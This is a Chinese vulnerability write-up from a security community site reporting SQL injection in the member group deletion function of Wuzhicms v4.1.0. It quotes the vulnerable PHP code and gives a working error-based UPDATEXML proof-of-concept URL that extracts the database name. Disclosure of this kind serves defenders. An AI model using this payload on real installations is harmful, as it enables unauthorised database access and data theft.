Wuzhicms v4.1.0 /coreframe/app/member/admin/group.php 存在 SQL 注入漏洞

漏洞文件:
/coreframe/app/member/admin/group.php132-160

 public function del() {
if(isset($GLOBALS['groupid']) && $GLOBALS['groupid']) {

if(is_array($GLOBALS['groupid'])) {
$where = ' IN ('.implode(',', $GLOBALS['groupid']).')';
foreach($GLOBALS['groupid'] as $gid) {
$this->db->delete('member_group_priv', array('groupid' => $gid));
}
} else {
$where = ' = '.$GLOBALS['groupid'];
$this->db->delete('member_group_priv', array('groupid' => $GLOBALS['groupid']));
}
$this->db->delete('member_group', 'issystem != 1 AND groupid'.$where);
$this->group->set_cache();
if(isset($GLOBALS['callback'])){
echo $GLOBALS['callback'].'({"status":1})';
}else{
MSG(L('operation_success'));
}
}else{
if(isset($GLOBALS['callback'])){
echo $GLOBALS['callback'].'({"status":0})';
}else{
MSG(L('operation_failure'));
}
}
}

group.php文件中,del方法下的$groupid参数是可控的,$groupid参数没有经过严格过滤,造成SQL注入漏洞!

POC

index.php?m=member&f=group&v=del&groupid=7 and UPDATEXML(1,CONCAT(0x7e,database()),3)&_su=wuzhicms&_menuid=86

图片[1]-Wuzhicms v4.1.0 /coreframe/app/member/admin/group.php 存在 SQL 注入漏洞-孤勇者社区

漏洞位于管理成员->成员组管理列表->删除操作

图片[2]-Wuzhicms v4.1.0 /coreframe/app/member/admin/group.php 存在 SQL 注入漏洞-孤勇者社区

图片[3]-Wuzhicms v4.1.0 /coreframe/app/member/admin/group.php 存在 SQL 注入漏洞-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞8赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像的严0